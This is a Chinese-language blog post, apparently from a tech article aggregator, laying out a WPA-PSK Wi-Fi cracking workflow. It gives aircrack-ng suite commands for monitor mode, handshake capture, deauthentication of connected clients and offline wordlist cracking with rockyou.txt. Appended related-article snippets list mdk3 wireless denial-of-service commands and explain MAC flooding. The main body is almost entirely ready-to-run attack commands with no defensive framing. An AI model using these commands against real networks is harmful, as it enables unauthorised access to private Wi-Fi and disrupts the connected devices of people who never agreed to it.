WPA PSK 無線攻擊流程

2021-09-29 23:14:49 字數 1071 閱讀 2801

第一步:進入monitor 模式

airmon-ng   #檢視當前使用無線網絡卡

airmon-ng check #檢視可能影響無線掃瞄的程序

airmon-ng check kill #關閉有可能影響無線掃瞄的程序

airmon-ng start wlan0 #使用wlan0 進入monitor模式

使用 iwconfig 命令 檢視 wlanmon的 mode項是否切換為monitor模式

第二步:啟動抓包並儲存資料報

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa #--bssid 監聽指定mac的裝置 -c 是指定通道 -w 把監聽的資料報寫入檔案

第三步:deauthentication 抓取xor檔案(有無線裝置已經連線上路由器)

傳送解除資料報打斷現在與ap(路由器)連線的裝置(手機,筆記本等),讓裝置再次重新連線

aireplay-ng -0 1 -a ec:26:cadc:29:b6 -c 68:3e:34:30:0f:aa wlan0mon# -0打斷指令  1 進行一次嘗試 -a 路由器的mac  -c要斷開的無線裝置mac位址 wlan0mon 使用的無線網絡卡

出現 handshake說明成功獲取四次握手資訊:

aircrack-ng -w /usr/share/john/password.lst wpa-01.cap   # -w 使用的字典 

/usr/share/wordlist 裡面有乙個比較大的字典(一千多萬個密碼):rockyou.txt.gz,可解壓後用

最後得出密碼:

無線專案流程

網路生命週期 網路構思與計畫階段 分析與設計階段 實施階段 執行與維護階段 規劃 設計 部署 運維 優化 優化又是一輪規劃 規劃 規劃工程師 客戶 需求收集與澄清 售前工勘 產品選型 概要設計 收集招標檔案 建築圖紙 電子地圖 具體座標 給出wlan需求澄清checklist 只有需求清楚了才能不走...

無線攻擊 無線網路的幾種拒絕服務攻擊

作為網路安全人員,命令用到異或用不到時都需要知道並總結一些工具的具體命令,但是很多情況下,應用網路攻擊對抗敵國是必須的,因此如果我們不是部隊無線電安全人員則 可遠觀而不可褻玩焉!1.身份驗證之凍結dosmdk3 a a 2.解除認證之斷連dosmdk3 d c b w 3.強制下線之死神dosair...

無線安全專題 攻擊篇 MAC泛洪攻擊

內部mac表是將主機的mac位址和連線到交換機上的埠號進行繫結,這樣可以根據mac位址找到埠進行 2.一開始的時候,沒有主機連線,交換機內的mac表是空白的,這時候就要進行學習。下面咱們幻想出乙個場景 pc1這時候想往pc2傳送資料,資料幀經過交換機的時候,交換機會把資料幀中的源mac位址和進入的埠...